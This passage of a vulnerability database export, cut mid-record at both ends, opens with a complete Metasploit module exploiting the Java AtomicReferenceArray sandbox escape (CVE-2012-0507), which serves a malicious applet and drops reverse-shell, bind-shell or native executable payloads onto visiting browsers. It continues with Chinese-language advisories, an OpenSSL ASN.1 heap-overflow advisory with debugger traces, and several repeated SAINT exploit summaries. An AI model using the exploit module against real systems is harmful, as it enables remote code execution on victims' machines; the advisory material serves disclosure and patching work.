'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize( info = {} )\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability due to the fact that\r\n\t\t\t\tAtomicReferenceArray uses the Unsafe class to store a reference in an\r\n\t\t\t\tarray directly, which may violate type safety if not used properly.\r\n\t\t\t\tThis allows a way to escape the JRE sandbox, and load additional classes\r\n\t\t\t\tin order to perform malicious operations.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'sinn3r', # metasploit module\r\n\t\t\t\t\t'juan vazquez', # metasploit module\r\n\t\t\t\t\t'egypt' # special assistance\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2012-0507'],\r\n\t\t\t\t\t['BID', '52161'],\r\n\t\t\t\t\t['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],\r\n\t\t\t\t\t['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],\r\n\t\t\t\t\t['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['java'],\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Mac OS X PPC (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Mac OS X x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Feb 14 2012'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\t# load the static jar file\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@jar_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\r\n\tdef on_request_uri( cli, request )\r\n\t\tdata = ""\r\n\t\thost = ""\r\n\t\tport = ""\r\n\t\tpeer = "#{cli.peerhost}:#{cli.peerport}"\r\n\r\n\t\tif not request.uri.match(/\\.jar$/i)\r\n\t\t\tif not request.uri.match(/\\/$/)\r\n\t\t\t\tsend_redirect( cli, get_resource() + '/', '')\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\tprint_status("#{peer} - Sending #{self.name}")\r\n\r\n\t\t\tpayload = regenerate_payload( cli )\r\n\t\t\tif not payload\r\n\t\t\t\tprint_error("#{peer} - Failed to generate the payload." )\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\tif target.name == 'Generic (Java Payload)'\r\n\t\t\t\tif datastore['LHOST']\r\n\t\t\t\t\tjar = payload.encoded\r\n\t\t\t\t\thost = datastore['LHOST']\r\n\t\t\t\t\tport = datastore['LPORT']\r\n\t\t\t\t\tvprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )\r\n\t\t\t\telse\r\n\t\t\t\t\tport = datastore['LPORT']\r\n\t\t\t\t\tdatastore['RHOST'] = cli.peerhost\r\n\t\t\t\t\tvprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )\r\n\t\t\t\tend\r\n\t\t\t\tif jar\r\n\t\t\t\t\tprint_status( "Generated jar to drop (#{jar.length} bytes)." )\r\n\t\t\t\t\tjar = Rex::Text.to_hex( jar, prefix="" )\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_error("#{peer} - Failed to generate the executable." )\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\r\n\t\t\telse\r\n\r\n\t\t\t\t# NOTE: The EXE mixin automagically handles detection of arch/platform\r\n\t\t\t\tdata = generate_payload_exe\r\n\r\n\t\t\t\tif data\r\n\t\t\t\t\tprint_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )\r\n\t\t\t\t\tdata = Rex::Text.to_hex( data, prefix="" )\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_error("#{peer} - Failed to generate the executable." )\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\r\n\r\n\t\t\tend\r\n\r\n\t\t\tsend_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status( "#{peer} - sending jar..." )\r\n\t\tsend_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )\r\n\r\n\t\thandler( cli )\r\n\tend\r\n\r\n\tdef generate_html( data, jar, host, port )\r\n\t\tjar_name = rand_text_alpha(rand(6)+3) + ".jar"\r\n\r\n\t\thtml = "<html><head></head>"\r\n\t\thtml += "<body>"\r\n\t\thtml += "<applet archive=\\"#{jar_name}\\" code=\\"msf.x.Exploit.class\\" width=\\"1\\" height=\\"1\\">"\r\n\t\thtml += "<param name=\\"data\\" value=\\"#{data}\\"/>" if data\r\n\t\thtml += "<param name=\\"jar\\" value=\\"#{jar}\\"/>" if jar\r\n\t\thtml += "<param name=\\"lhost\\" value=\\"#{host}\\"/>" if host\r\n\t\thtml += "<param name=\\"lport\\" value=\\"#{port}\\"/>" if port\r\n\t\thtml += "</applet></body></html>"\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef generate_jar()\r\n\t\treturn @jar_data\r\n\tend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72735", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:04:49", "description": "BUGTRAQ ID: 52161\r\nCVE ID: CVE-2012-0507\r\n\r\nSun Java Runtime Environment\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nOracle Java SE\u4e2d\u7684Java Runtime Environment\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u6f0f\u6d1e\uff0c\u53ef\u901a\u8fc7\u591a\u4e2a\u534f\u8bae\u5229\u7528\uff0c\u672a\u7ecf\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5f71\u54cdi18n\u5b50\u7ec4\u4ef6\uff0c\u5bfc\u81f4\u90e8\u5206\u63a7\u5236\u53d7\u5f71\u54cd\u7ec4\u4ef6\u3002\u6b64\u6f0f\u6d1e\u53ef\u5f71\u54cd\uff1a7 Update 2\u30016 Update 30\u30015.0 Update 33\r\n0\r\nOracle Sun JRE 1.6.x\r\nOracle Sun JDK 1.6.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOracle\r\n------\r\nOracle\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08javacpufeb2012-366318\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\njavacpufeb2012-366318\uff1aOracle Java SE Critical Patch Update Advisory - February 2012\r\n\r\n\u94fe\u63a5\uff1ahttp://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html", "cvss3": {}, "published": "2012-02-29T00:00:00", "type": "seebug", "title": "Oracle Java SE i18n\u5b50\u7ec4\u4ef6\u8fdc\u7a0b\u5b89\u5168\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2012-02-29T00:00:00", "id": "SSV:30150", "href": "https://www.seebug.org/vuldb/ssvid-30150", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:50:34", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "OpenSSL ASN1 BIO Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2014-07-01T00:00:00", "id": "SSV:72797", "href": "https://www.seebug.org/vuldb/ssvid-72797", "sourceData": "\n Incorrect integer conversions in OpenSSL can result in memory corruption.\r\n--------------------------------------------------------------------------\r\n\r\nCVE-2012-2110\r\n\r\nThis advisory is intended for system administrators and developers exposing\r\nOpenSSL in production systems to untrusted data.\r\n\r\nasn1_d2i_read_bio in OpenSSL contains multiple integer errors that can cause\r\nmemory corruption when parsing encoded ASN.1 data. This error can be exploited\r\non systems that parse untrusted data, such as X.509 certificates or RSA public\r\nkeys.\r\n\r\nThe following context structure from asn1.h is used to record the current state\r\nof the decoder:\r\n\r\ntypedef struct asn1_const_ctx_st\r\n{\r\n const unsigned char *p;/* work char pointer */\r\n int eos; /* end of sequence read for indefinite encoding */\r\n int error; /* error code to use when returning an error */\r\n int inf; /* constructed if 0x20, indefinite is 0x21 */\r\n int tag; /* tag from last 'get object' */\r\n int xclass; /* class from last 'get object' */\r\n long slen; /* length of last 'get object' */\r\n const unsigned char *max; /* largest value of p allowed */\r\n const unsigned char *q;/* temporary variable */\r\n const unsigned char **pp;/* variable */\r\n int line; /* used in error processing */\r\n} ASN1_const_CTX;\r\n\r\nThese members are populated via calls to ASN1_get_object and asn1_get_length\r\nwhich have the following prototypes\r\n\r\nint ASN1_get_object(const unsigned char **pp,\r\n long *plength,\r\n int *ptag,\r\n int *pclass,\r\n long omax);\r\n\r\nint asn1_get_length(const unsigned char **pp,\r\n int *inf,\r\n long *rl,\r\n int max);\r\n\r\nThe lengths are always stored as signed longs, however, asn1_d2i_read_bio\r\ncasts ASN1_const_CTX->slen to a signed int in multiple locations. This\r\ntruncation can result in numerous conversion problems.\r\n\r\nThe most visible example on x64 is this cast incorrectly interpreting the\r\nresult of asn1_get_length.\r\n\r\n222 /* suck in c.slen bytes of data */\r\n223 want=(int)c.slen;\r\n\r\nA simple way to demonstrate this is to prepare a DER certificate that contains\r\na length with the 31st bit set, like so\r\n\r\n$ dumpasn1 testcase.crt\r\n0 NDEF: [PRIVATE 3] {\r\n 2 2147483648: [1]\r\n ...\r\n }\r\n\r\nBreakpoint 2, asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffffffd8f0) at a_d2i_fp.c:224\r\n224 if (want > (len-off))\r\n(gdb) list\r\n219 }\r\n220 else\r\n221 {\r\n222 /* suck in c.slen bytes of data */\r\n223 want=(int)c.slen;\r\n224 if (want > (len-off))\r\n225 {\r\n226 want-=(len-off);\r\n227 if (!BUF_MEM_grow_clean(b,len+want))\r\n228 {\r\n(gdb) p c.slen\r\n$18 = 2147483648\r\n(gdb) p want\r\n$19 = -2147483648\r\n\r\nThis results in an inconsistent state, and will lead to memory corruption.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAll versions of OpenSSL on all platforms up to and including version 1.0.1 are\r\naffected.\r\n\r\nSome attack vectors require an I32LP64 architecture, others do not.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIn order to explore the subtle problems caused by this, an unrelated bug in the\r\nOpenSSL allocator wrappers must be discussed.\r\n\r\nIt is generally expected that the realloc standard library routine should support\r\nreducing the size of a buffer, as well as increasing it. As ISO C99 states "The\r\nrealloc function deallocates the old object pointed to by ptr and returns a\r\npointer to a new object that has the size speci?ed by size. The contents of the\r\nnew object shall be the same as that of the old object prior to deallocation,\r\nup to the lesser of the new and old sizes."\r\n\r\nHowever, the wrapper routines from OpenSSL do not support shrinking a buffer,\r\ndue to this code:\r\n\r\nvoid *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line)\r\n{\r\n /* ... */\r\n ret=malloc_ex_func(num,file,line);\r\n if(ret)\r\n {\r\n memcpy(ret,str,old_len);\r\n OPENSSL_cleanse(str,old_len);\r\n free_func(str);\r\n }\r\n /* ... */\r\n return ret;\r\n}\r\n\r\nThe old data is always copied over, regardless of whether the new size will be\r\nenough. This allows us to turn this truncation into what is effectively:\r\n\r\n memcpy(heap_buffer, <attacker controlled buffer>, <attacker controlled size>);\r\n\r\nWe can reach this code by simply causing an integer to be sign extended and\r\ntruncated multiple times. These two protoypes are relevant:\r\n\r\nint BUF_MEM_grow_clean(BUF_MEM *str, size_t len);\r\n\r\nvoid *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line);\r\n\r\nBUF_MEM_grow_clean accepts a size_t, but the subroutine it uses to handle the\r\nallocation only accepts a 32bit signed integer. We can exploit this by\r\nproviding a large amount of data to OpenSSL, and causing the length calculation\r\nhere to become negative:\r\n\r\n /* suck in c.slen bytes of data */\r\n want=(int)c.slen;\r\n if (want > (len-off))\r\n {\r\n want-=(len-off);\r\n if (!BUF_MEM_grow_clean(b,len+want))\r\n {\r\n ASN1err(ASN1_F_ASN1_D2I_READ_BIO,ERR_R_MALLOC_FAILURE);\r\n goto err;\r\n }\r\n\r\nBecause want is a signed int, the sign extension to size_t for\r\nBUF_MEM_grow_clean means an unexpectedly size_t is produced. An\r\nexample is probably helpful:\r\n\r\n(gdb) bt\r\n#0 asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffffffd8f0) at a_d2i_fp.c:223\r\n#1 0x0000000000524ce8 in ASN1_item_d2i_bio (it=0x62d740, in=0x9173a0, x=0x0) at a_d2i_fp.c:112\r\n#2 0x000000000054c132 in d2i_X509_bio (bp=0x9173a0, x509=0x0) at x_all.c:150\r\n#3 0x000000000043b7a7 in load_cert (err=0x8a1010, file=0x0, format=1, pass=0x0, e=0x0, cert_descrip=0x5ebcc0 "Certificate") at apps.c:819\r\n#4 0x0000000000422422 in x509_main (argc=0, argv=0x7fffffffe458) at x509.c:662\r\n#5 0x00000000004032d9 in do_cmd (prog=0x9123e0, argc=3, argv=0x7fffffffe440) at openssl.c:489\r\n#6 0x0000000000402ee6 in main (Argc=3, Argv=0x7fffffffe440) at openssl.c:381\r\n(gdb) list\r\n218 want=HEADER_SIZE;\r\n219 }\r\n220 else \r\n221 {\r\n222 /* suck in c.slen bytes of data */\r\n223 want=(int)c.slen;\r\n224 if (want > (len-off))\r\n225 {\r\n226 want-=(len-off);\r\n227 if (!BUF_MEM_grow_clean(b,len+want))\r\n(gdb) pt len\r\ntype = int\r\n(gdb) pt want\r\ntype = int\r\n(gdb) p len\r\n$28 = 1431655797\r\n(gdb) p want\r\n$29 = 2147483646\r\n(gdb) p len+want\r\n$30 = -715827853\r\n(gdb) s\r\nBUF_MEM_grow_clean (str=0x917440, len=18446744072993723763) at buffer.c:133\r\n(gdb) p/x len\r\n$31 = 0xffffffffd5555573\r\n\r\nHere len+want wraps to a negative value, which is sign extended to a large\r\nsize_t for BUF_MEM_grow_clean. Now the call to CRYPTO_realloc_clean() truncates\r\nthis back into a signed int:\r\n\r\nCRYPTO_realloc_clean (str=0x7fff85be4010, old_len=1908874388, num=477218632, file=0x626661 "buffer.c", line=149) at mem.c:369\r\n\r\nNow old_len > num, which openssl does not handle, resulting in this:\r\n\r\n ret = malloc_ex_func(num, file, line);\r\n\r\n memcpy(ret, str, old_len);\r\n\r\nEffectively a textbook heap overflow. It is likely this code is reachable via\r\nthe majority of the d2i BIO interfaces and their wrappers, so most applications\r\nthat handle untrusted data via OpenSSL should take action.\r\n\r\nNote that even if you do not use d2i_* calls directly, many of the higher level\r\nAPIs will use it indirectly for you. Producing DER data to demonstrate this\r\nis relatively easy for both x86 and x64 architectures.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nThe OpenSSL project has provided an updated version to resolve this issue.\r\n\r\nhttp://www.openssl.org/\r\nhttp://www.openssl.org/news/secadv_20120419.txt\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy, Google Security Team.\r\n\r\nAdditional thanks to Adam Langley also of Google for analysis and designing a fix.\r\n\r\n-- \r\n-------------------------------------\r\ntaviso at cmpxchg8b.com | pgp encrypted mail preferred\r\n-------------------------------------------------------\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72797", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:20:55", "description": "BUGTRAQ ID: 53158\r\nCVE ID: CVE-2012-2110\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\nOpenSSL\u5728\u5904\u7406DER\u683c\u5f0f\u6570\u636e\u65f6\uff0c "asn1_d2i_read_bio()"\u51fd\u6570\u4e2d\u5b58\u5728\u7c7b\u578b\u8f6c\u6362\u9519\u8bef\uff0c\u53ef\u88ab\u5229\u7528\u9020\u6210\u5806\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u6210\u529f\u5229\u7528\u7684\u5e73\u53f0\u4e3a64\u4f4d\u7cfb\u7edf\u3002\n0\nOpenSSL 1.x\r\nOpenSSL 0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpenSSL Project\r\n---------------\r\nOpenSSL Project\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08secadv_20120419\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nsecadv_20120419\uff1aOpenSSL Security Advisory [19 Apr 2012]\r\n\r\n\u94fe\u63a5\uff1ahttp://www.openssl.org/news/secadv_20120419.txt", "cvss3": {}, "published": "2012-04-22T00:00:00", "type": "seebug", "title": "OpenSSL "asn1_d2i_read_bio()" DER\u683c\u5f0f\u6570\u636e\u5904\u7406\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-22T00:00:00", "id": "SSV:60076", "href": "https://www.seebug.org/vuldb/ssvid-60076", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:57", "description": "Added: 03/30/2012 \nCVE: [CVE-2012-0507](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507>) \nBID: [52161](<http://www.securityfocus.com/bid/52161>) \nOSVDB: [80724](<http://www.osvdb.org/80724>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava Standard Edition (Java SE) includes the Java Virtual Machine, along with a standard set of libraries used by many applications. \n\n### Problem\n\nIn affected versions of Java SE, the AtomicReferenceArray class uses an Unsafe class to store a reference. Attackers may leverage this weakness to escape the JRE sandbox. If successful, the attackers may then load java code of their choice, which could result in execution of arbitrary code on the target server. \n\n### Resolution\n\nApply the [Oracle Java SE Critical Patch Update February 2012](<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html>), upgrade Java SE to a version later than 7 Update 2, 6 Update 30, 5.0 Update 33, 1.4.2_35, or JavaFX 2.0.2. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx> \n<http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 2 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-03-30T00:00:00", "type": "saint", "title": "Java SE AtomicReferenceArray Unsafe Security Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2012-03-30T00:00:00", "id": "SAINT:6558E3E080367BA482316AE6D48877BA", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/java_se_atomicreferencearray_unsafe", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-12-07T20:52:19", "description": "Added: 03/30/2012 \nCVE: [CVE-2012-0507](<https://vulners.com/cve/CVE-2012-0507>) \nBID: [52161](<http://www.securityfocus.com/bid/52161>) \nOSVDB: [80724](<http://www.osvdb.org/80724>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava Standard Edition (Java SE) includes the Java Virtual Machine, along with a standard set of libraries used by many applications. \n\n### Problem\n\nIn affected versions of Java SE, the AtomicReferenceArray class uses an Unsafe class to store a reference. Attackers may leverage this weakness to escape the JRE sandbox. If successful, the attackers may then load java code of their choice, which could result in execution of arbitrary code on the target server. \n\n### Resolution\n\nApply the [Oracle Java SE Critical Patch Update February 2012](<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html>), upgrade Java SE to a version later than 7 Update 2, 6 Update 30, 5.0 Update 33, 1.4.2_35, or JavaFX 2.0.2. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx> \n<http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 2 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-03-30T00:00:00", "type": "saint", "title": "Java SE AtomicReferenceArray Unsafe Security Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2012-03-30T00:00:00", "id": "SAINT:862F3D5093666FCD7985C6448451D516", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/java_se_atomicreferencearray_unsafe", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:32", "description": "Added: 03/30/2012 \nCVE: [CVE-2012-0507](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507>) \nBID: [52161](<http://www.securityfocus.com/bid/52161>) \nOSVDB: [80724](<http://www.osvdb.org/80724>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava Standard Edition (Java SE) includes the Java Virtual Machine, along with a standard set of libraries used by many applications. \n\n### Problem\n\nIn affected versions of Java SE, the AtomicReferenceArray class uses an Unsafe class to store a reference. Attackers may leverage this weakness to escape the JRE sandbox. If successful, the attackers may then load java code of their choice, which could result in execution of arbitrary code on the target server. \n\n### Resolution\n\nApply the [Oracle Java SE Critical Patch Update February 2012](<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html>), upgrade Java SE to a version later than 7 Update 2, 6 Update 30, 5.0 Update 33, 1.4.2_35, or JavaFX 2.0.2. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx> \n<http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 2 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-03-30T00:00:00", "type": "saint", "title": "Java SE AtomicReferenceArray Unsafe Security Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2012-03-30T00:00:00", "id": "SAINT:2A2447E1BCC3EED8CC15036CFE02E6AD", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/java_se_atomicreferencearray_unsafe", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T16:51:42", "description": "Added: 03/30/2012 \nCVE: [CVE-2012-0507](<https://vulners.com/cve/CVE-2012-0507>) \nBID: [52161](<http://www.securityfocus.com/bid/52161>) \nOSVDB: [80724](<http://www.osvdb.org/80724>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava Standard Edition (Java SE) includes the Java Virtual Machine, along with a standard set of libraries used by many applications. \n\n### Problem\n\nIn affected versions of Java SE, the AtomicReferenceArray class uses an Unsafe class to store a reference. Attackers may leverage this weakness to escape the JRE sandbox. If successful, the attackers may then load java code of their choice, which could result in execution of arbitrary code on the target server. \n\n### Resolution\n\nApply the [Oracle Java SE Critical Patch Update February 2012](<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html>), upgrade Java SE to a version later than 7 Update 2, 6 Update 30, 5.0 Update 33, 1.4.2_35, or JavaFX 2.0.2. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html> \n<http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx> \n<http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 2 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-03-30T00:00:00", "type": "saint", "title": "Java SE AtomicReferenceArray Unsafe Security Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": 